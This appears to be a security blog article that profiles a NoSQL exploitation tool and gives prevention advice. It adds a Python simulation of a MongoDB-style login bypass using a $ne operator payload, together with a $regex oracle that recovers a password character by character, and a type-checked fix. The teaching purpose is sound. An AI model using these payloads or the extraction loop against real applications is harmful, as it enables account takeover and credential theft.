NoSQL Exploitation Framework – Tool of the Month
NoSQL Exploitation Framework – a tool for learning NoSQL injection
NoSQL, which stands for Not Only SQL, is a common term for nonrelational databases. Popular NoSQL databases include MongoDB and CouchDB, along with Redis, Cassandra and others. NoSQL databases have become increasingly popular thanks to their advantages in particular use cases, especially big data and real-time web workloads where performance, scalability and flexibility are key.
NoSQL Exploitation Framework
NoSQL databases are also vulnerable to injection attacks. A typical example is an attack in which the attacker retrieves the admin user's record without knowing the password: the application passes client-controlled input into the query unchanged, so the attacker substitutes a query operator for the expected password value.
Author: Francis Alexander
URL: https://github.com/torque59/nosql-exploitation-framework
System: Linux and Windows
Recent additions to the project:
- Support for MongoDB, CouchDB, Redis, HBase and Cassandra;
- Support for NoSQL web applications;
- Payload list for JavaScript injection, and web application enumeration;
- Scanning support for MongoDB, CouchDB and Redis;
- Dictionary attacks against MongoDB, CouchDB and Redis;
- Enumeration module for the databases that retrieves their data;
- Detection of the MongoDB web interface;
- Shodan query support;
- Multi-threaded scanner for a list of IP addresses;
- Sniffing for MongoDB, CouchDB and Redis traffic.
How Do I Prevent It?
Here are some measures to prevent SQL / NoSQL injection attacks, or minimize impact if it happens:
- Prepared Statements: For SQL calls, use prepared statements (parameterized queries) instead of building dynamic queries by string concatenation. NoSQL drivers have no direct equivalent, so never pass a client-supplied object (for example a parsed JSON body) straight into a query; treat every user-supplied value as a plain value, never as a query fragment.
- Input Validation: Validate inputs to detect malicious values. For NoSQL databases, also validate input types against the expected types: a password field must be a string, not an object carrying an operator such as $ne or $regex.
- Least Privilege: To minimize the potential damage of a successful injection attack, do not assign DBA or admin type access rights to your application accounts. Similarly minimize the privileges of the operating system account that the database process runs under.
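The following is an added example, not code from the original page or from the NoSQL Exploitation Framework project. It models both the attack described above (retrieving the admin record without knowing the password) and the type-validation countermeasure from the list above. MongoDB is not required: a small in-memory matcher that understands a subset of the MongoDB filter language ($ne, $gt, $regex) stands in for the collection, and the user documents and attacker payloads are constructed. It also goes one step beyond the page's description by showing how the same flaw turns the login endpoint into a character-by-character password oracle via $regex.

```python
import re

# Constructed sample data standing in for a `users` collection.
USERS = [
    {"_id": 1, "username": "admin", "password": "s3cr3t-hunter2", "role": "admin"},
    {"_id": 2, "username": "alice", "password": "wonderland", "role": "user"},
]


def _match_value(actual, cond):
    """Match one field against a query condition. A dict condition is an operator
    object, as in MongoDB's filter language; anything else is an equality test.
    Only $ne, $gt and $regex are modelled here (assumption: enough for the demo)."""
    if isinstance(cond, dict):
        for op, arg in cond.items():
            if op == "$ne":
                if actual == arg:
                    return False
            elif op == "$gt":
                if actual is None or not actual > arg:
                    return False
            elif op == "$regex":
                if not (isinstance(actual, str) and re.search(arg, actual)):
                    return False
            else:
                raise ValueError(f"unsupported operator {op!r}")
        return True
    return actual == cond


def find_one(collection, query):
    """Return the first document matching every field of `query`, or None."""
    for doc in collection:
        if all(_match_value(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def login_vulnerable(body):
    """The bug: the parsed JSON request body is spliced straight into the filter,
    so a client can send {"password": {"$ne": ""}} and the operator reaches the DB."""
    return find_one(USERS, {"username": body.get("username"),
                            "password": body.get("password")})


def login_hardened(body):
    """The fix: validate types before values reach the query. Only strings are
    accepted, so an attacker-supplied operator object is rejected outright."""
    username = body.get("username")
    password = body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None  # type mismatch: object, array or number where a string is expected
    return find_one(USERS, {"username": username, "password": password})


def extract_password(login, username, alphabet="abcdefghijklmnopqrstuvwxyz0123456789-", max_len=32):
    """Abuse a login endpoint as a boolean oracle: a $regex anchored on the prefix
    recovered so far reveals the password one character at a time. Returns the
    recovered string; empty when the endpoint rejects operators (the hardened one)."""
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            probe = {"username": username, "password": {"$regex": "^" + re.escape(known + ch)}}
            if login(probe) is not None:
                known += ch
                break
        else:
            return known  # no extension matched: done, or a character outside the alphabet
        full = {"username": username, "password": {"$regex": "^" + re.escape(known) + "$"}}
        if login(full) is not None:
            return known  # the whole password has been recovered
    return known


if __name__ == "__main__":
    # Constructed attacker payload: known username, password replaced by an operator.
    payload = {"username": "admin", "password": {"$ne": ""}}
    print("vulnerable login:", login_vulnerable(payload))
    print("hardened login:  ", login_hardened(payload))
    print("oracle extraction (vulnerable):", extract_password(login_vulnerable, "admin"))
    print("oracle extraction (hardened):  ", repr(extract_password(login_hardened, "admin")))
```

The vulnerable path returns the admin document for the `$ne` payload and leaks the full password through the regex oracle; the hardened path returns nothing for both, because the type check rejects the operator object before any query is built. In a real deployment the same check belongs at the boundary where JSON bodies, query strings or PHP-style `a[$ne]=1` parameters are parsed into objects.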